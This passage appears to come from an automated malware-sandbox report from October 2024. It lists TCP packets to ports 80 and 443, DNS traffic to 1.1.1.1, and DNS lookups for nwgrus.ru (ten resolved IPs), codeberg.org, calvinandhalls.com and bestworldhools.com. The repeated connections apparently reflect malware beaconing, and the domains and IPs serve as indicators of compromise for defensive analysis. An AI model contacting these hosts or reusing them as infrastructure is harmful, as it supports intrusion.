                                                                                                                                            Oct 4, 2024 19:18:18.013772964 CEST44349843217.197.91.145192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:18.128263950 CEST4986480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:18.133480072 CEST8049864177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:18.133574009 CEST4986480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:18.133738041 CEST4986480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:18.133766890 CEST4986480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:18.138978004 CEST8049864177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:18.139091969 CEST8049864177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:19.448740959 CEST8049864177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:19.449132919 CEST8049864177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:19.449250937 CEST4986480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:19.458019018 CEST4986480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:19.466027975 CEST8049864177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:28.820820093 CEST5003580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:28.826529980 CEST8050035177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:28.826658964 CEST5003580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:28.826828003 CEST5003580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:28.826857090 CEST5003580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:28.831943989 CEST8050035177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:28.832629919 CEST8050035177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:30.096446991 CEST8050035177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:30.096652031 CEST8050035177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:30.096822023 CEST5003580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:30.096822023 CEST5003580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:30.101908922 CEST8050035177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:36.430124044 CEST5003680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:36.435903072 CEST8050036177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:36.436017990 CEST5003680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:36.436177969 CEST5003680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:36.436213970 CEST5003680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:36.441099882 CEST8050036177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:36.441767931 CEST8050036177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:37.690862894 CEST8050036177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:37.690943956 CEST8050036177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:37.691008091 CEST5003680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:37.691874027 CEST5003680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:37.696819067 CEST8050036177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:45.953680038 CEST5003780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:45.959500074 CEST8050037177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:45.959570885 CEST5003780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:45.959671021 CEST5003780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:45.959683895 CEST5003780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:45.964981079 CEST8050037177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:45.964996099 CEST8050037177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:47.222836971 CEST8050037177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:47.222884893 CEST8050037177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:47.223334074 CEST5003780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:47.232820034 CEST5003780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:47.239149094 CEST8050037177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:57.421247005 CEST5003880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:57.426314116 CEST8050038177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:57.426393986 CEST5003880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:57.426565886 CEST5003880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:57.426613092 CEST5003880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:57.431416035 CEST8050038177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:57.431901932 CEST8050038177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:58.725389004 CEST8050038177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:58.725440979 CEST8050038177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:58.725636005 CEST5003880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:58.725713015 CEST5003880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:19:58.730665922 CEST8050038177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.839889050 CEST5003980192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:12.844799995 CEST8050039180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.844893932 CEST5003980192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:12.845024109 CEST5003980192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:12.845060110 CEST5003980192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:12.849987984 CEST8050039180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.850317001 CEST8050039180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:14.259684086 CEST8050039180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:14.259708881 CEST8050039180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:14.259793043 CEST5003980192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:14.259963036 CEST5003980192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:14.265479088 CEST8050039180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:25.867358923 CEST5004080192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:26.756330967 CEST8050040180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:26.756417990 CEST5004080192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:26.766762018 CEST5004080192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:26.766762018 CEST5004080192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:26.771835089 CEST8050040180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:26.771863937 CEST8050040180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:28.126101017 CEST8050040180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:28.126162052 CEST8050040180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:28.126238108 CEST5004080192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:28.126447916 CEST5004080192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:28.131453991 CEST8050040180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:41.507024050 CEST5004180192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:41.512254953 CEST8050041180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:41.512350082 CEST5004180192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:41.512470007 CEST5004180192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:41.512487888 CEST5004180192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:41.517333984 CEST8050041180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:41.517349958 CEST8050041180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:42.964591026 CEST8050041180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:42.965174913 CEST8050041180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:42.965243101 CEST5004180192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:42.965286016 CEST5004180192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:42.972560883 CEST8050041180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:56.191772938 CEST5004280192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:56.198712111 CEST8050042180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:56.198828936 CEST5004280192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:56.199033976 CEST5004280192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:56.199057102 CEST5004280192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:56.206754923 CEST8050042180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:56.206785917 CEST8050042180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:57.598699093 CEST8050042180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:57.598757982 CEST8050042180.75.11.133192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:57.598841906 CEST5004280192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:57.599020958 CEST5004280192.168.2.4180.75.11.133
                                                                                                                                            Oct 4, 2024 19:20:57.603846073 CEST8050042180.75.11.133192.168.2.4
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 4, 2024 19:17:27.700813055 CEST5901653192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:17:28.741741896 CEST5901653192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:17:29.742078066 CEST5901653192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST53590161.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST53590161.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST53590161.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:13.850114107 CEST5916753192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:18:13.858931065 CEST53591671.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:32.498121023 CEST6222953192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:18:33.515808105 CEST6222953192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:18:33.557799101 CEST53622291.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:33.558357954 CEST53622291.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:33.566003084 CEST5896553192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:18:34.570085049 CEST5896553192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:18:34.734561920 CEST53589651.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:34.734599113 CEST53589651.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:44.162974119 CEST5441153192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:45.190474033 CEST5441153192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:45.620026112 CEST53544111.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:45.620125055 CEST53544111.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:45.641482115 CEST4931053192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:46.656568050 CEST4931053192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:46.745006084 CEST53493101.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:46.745026112 CEST53493101.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:56.829653025 CEST6251853192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:57.830749035 CEST6251853192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:57.915266991 CEST53625181.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:57.916254044 CEST53625181.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:19:57.950525999 CEST6433553192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:19:58.484646082 CEST53643351.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:10.465905905 CEST4932753192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:10.645824909 CEST6294353192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:11.461026907 CEST4932753192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:11.632920980 CEST6294353192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:11.881942987 CEST53493271.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:11.881966114 CEST53493271.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.034105062 CEST6050653192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:12.648463011 CEST6294353192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST53629431.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST53629431.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST53629431.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:12.967906952 CEST53605061.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:24.607144117 CEST5931053192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:25.121330023 CEST53593101.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:25.162956953 CEST6149153192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:26.175026894 CEST6149153192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:26.754235983 CEST53614911.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:26.757999897 CEST53614911.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:39.959743977 CEST6006153192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:39.974594116 CEST53600611.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:40.002228022 CEST6421253192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:40.950891972 CEST53642121.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:54.569093943 CEST5483353192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:55.577992916 CEST5483353192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:55.620475054 CEST53548331.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:55.620501041 CEST53548331.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:55.642632008 CEST6445753192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:56.644588947 CEST6445753192.168.2.41.1.1.1
                                                                                                                                            Oct 4, 2024 19:20:56.917818069 CEST53644571.1.1.1192.168.2.4
                                                                                                                                            Oct 4, 2024 19:20:56.917860031 CEST53644571.1.1.1192.168.2.4
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Oct 4, 2024 19:17:27.700813055 CEST192.168.2.41.1.1.10x6995Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:28.741741896 CEST192.168.2.41.1.1.10x6995Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.742078066 CEST192.168.2.41.1.1.10x6995Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:13.850114107 CEST192.168.2.41.1.1.10x2a71Standard query (0)codeberg.orgA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:32.498121023 CEST192.168.2.41.1.1.10xe056Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:33.515808105 CEST192.168.2.41.1.1.10xe056Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:33.566003084 CEST192.168.2.41.1.1.10xb7ceStandard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:34.570085049 CEST192.168.2.41.1.1.10xb7ceStandard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:44.162974119 CEST192.168.2.41.1.1.10x3012Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:45.190474033 CEST192.168.2.41.1.1.10x3012Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:45.641482115 CEST192.168.2.41.1.1.10x2969Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:46.656568050 CEST192.168.2.41.1.1.10x2969Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:56.829653025 CEST192.168.2.41.1.1.10x96aeStandard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:57.830749035 CEST192.168.2.41.1.1.10x96aeStandard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:57.950525999 CEST192.168.2.41.1.1.10x8d76Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:10.465905905 CEST192.168.2.41.1.1.10x58f9Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:10.645824909 CEST192.168.2.41.1.1.10xa7Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:11.461026907 CEST192.168.2.41.1.1.10x58f9Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:11.632920980 CEST192.168.2.41.1.1.10xa7Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.034105062 CEST192.168.2.41.1.1.10x4840Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.648463011 CEST192.168.2.41.1.1.10xa7Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:24.607144117 CEST192.168.2.41.1.1.10xbc93Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:25.162956953 CEST192.168.2.41.1.1.10xe458Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:26.175026894 CEST192.168.2.41.1.1.10xe458Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:39.959743977 CEST192.168.2.41.1.1.10xf42bStandard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:40.002228022 CEST192.168.2.41.1.1.10xae14Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:54.569093943 CEST192.168.2.41.1.1.10xc023Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:55.577992916 CEST192.168.2.41.1.1.10xc023Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:55.642632008 CEST192.168.2.41.1.1.10xf725Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:56.644588947 CEST192.168.2.41.1.1.10xf725Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890300989 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890316010 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:17:29.890326023 CEST1.1.1.1192.168.2.40x6995No error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:13.858931065 CEST1.1.1.1192.168.2.40x2a71No error (0)codeberg.org217.197.91.145A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:33.557799101 CEST1.1.1.1192.168.2.40xe056Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:33.558357954 CEST1.1.1.1192.168.2.40xe056Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:34.734561920 CEST1.1.1.1192.168.2.40xb7ceName error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:18:34.734599113 CEST1.1.1.1192.168.2.40xb7ceName error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:45.620026112 CEST1.1.1.1192.168.2.40x3012Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:45.620125055 CEST1.1.1.1192.168.2.40x3012Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:46.745006084 CEST1.1.1.1192.168.2.40x2969Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:46.745026112 CEST1.1.1.1192.168.2.40x2969Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:57.915266991 CEST1.1.1.1192.168.2.40x96aeName error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:57.916254044 CEST1.1.1.1192.168.2.40x96aeName error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:19:58.484646082 CEST1.1.1.1192.168.2.40x8d76Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:11.881942987 CEST1.1.1.1192.168.2.40x58f9Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:11.881966114 CEST1.1.1.1192.168.2.40x58f9Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
